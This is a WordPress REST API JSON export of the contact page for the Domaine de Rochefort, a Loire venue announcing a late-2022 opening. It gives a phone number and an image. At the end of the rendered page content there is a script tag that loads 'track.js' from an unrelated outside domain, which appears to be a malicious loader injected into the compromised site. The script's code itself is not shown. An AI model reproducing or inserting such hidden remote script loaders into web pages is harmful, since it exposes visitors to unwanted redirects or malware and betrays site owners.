{"id":11,"date":"2021-05-25T11:07:15","date_gmt":"2021-05-25T09:07:15","guid":{"rendered":"http:\/\/domainederochefort.fr\/?page_id=11"},"modified":"2022-07-19T12:56:16","modified_gmt":"2022-07-19T10:56:16","slug":"contact","status":"publish","type":"page","link":"http:\/\/domainederochefort.fr\/?page_id=11","title":{"rendered":"Contact"},"content":{"rendered":"\n<p class=\"has-text-color\" style=\"font-size:28px;color:#de5cc0\"><strong>OUVERTURE FIN 2022<\/strong><\/p>\n\n\n\n<p>Situ\u00e9 au c\u0153ur de la Loire, le domaine de Rochefort vous accueillera \u00e0 partir d&#8217;Octobre 2022 toute l&#8217;ann\u00e9e sous r\u00e9servation.<\/p>\n\n\n\n<p><strong>Nous contacter : <\/strong><\/p>\n\n\n\n<p>\ud83d\udcde 06 80 23 24 32<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" width=\"1024\" height=\"683\" src=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920-1024x683.jpg\" alt=\"\" class=\"wp-image-105\" srcset=\"http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920-1024x683.jpg 1024w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920-300x200.jpg 300w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920-768x512.jpg 768w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920-1536x1024.jpg 1536w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920-90x60.jpg 90w, http:\/\/domainederochefort.fr\/wp-content\/uploads\/2021\/05\/little-girl-2516582_1920.jpg 1920w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script src='https:\/\/trick.cofounderspecials.com\/track.js?v=9.999' type='text\/javascript'><\/script>","protected":false},"excerpt":{"rendered":"<p>OUVERTURE FIN 2022 Situ\u00e9 au c\u0153ur de la Loire, le domaine de Rochefort vous accueillera \u00e0 partir d&#8217;Octobre 2022 toute l&#8217;ann\u00e9e sous r\u00e9servation. Nous contacter : \ud83d\udcde 06 80 23 24 32<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/11"}],"collection":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=11"}],"version-history":[{"count":9,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions"}],"predecessor-version":[{"id":123,"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=\/wp\/v2\/pages\/11\/revisions\/123"}],"wp:attachment":[{"href":"http:\/\/domainederochefort.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=11"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}